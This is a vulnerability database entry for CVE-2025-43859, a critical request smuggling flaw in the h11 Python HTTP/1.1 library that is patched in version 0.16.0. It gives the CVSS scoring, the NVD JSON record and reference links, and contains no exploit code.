FKIE_CVE-2025-43859

Vulnerability from fkie_nvd - Published: 2025-04-24 19:15 - Updated: 2025-04-29 13:52
Severity ?
9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Summary
h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.
References
security-advisories@github.comhttps://github.com/python-hyper/h11/commit/114803a29ce50116dc47951c690ad4892b1a36ed
security-advisories@github.comhttps://github.com/python-hyper/h11/security/advisories/GHSA-vqfr-h8mv-ghfj
Impacted products
Vendor Product Version
To clipboard 

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11\u0027s parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue."
    },
    {
      "lang": "es",
      "value": "h11 es una implementaci\u00f3n de Python de HTTP/1.1. Antes de la versi\u00f3n 0.16.0, una tolerancia en el an\u00e1lisis de terminadores de l\u00ednea por parte de h11 en cuerpos de mensajes con codificaci\u00f3n fragmentada pod\u00eda provocar vulnerabilidades de contrabando de solicitudes en ciertas circunstancias. Este problema se ha corregido en la versi\u00f3n 0.16.0. Dado que su explotaci\u00f3n requiere la combinaci\u00f3n de h11 con errores y un proxy inverso con errores, la correcci\u00f3n de cualquiera de los componentes es suficiente para mitigar este problema."
    }
  ],
  "id": "CVE-2025-43859",
  "lastModified": "2025-04-29T13:52:28.490",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-04-24T19:15:47.060",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/python-hyper/h11/commit/114803a29ce50116dc47951c690ad4892b1a36ed"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/python-hyper/h11/security/advisories/GHSA-vqfr-h8mv-ghfj"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-444"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.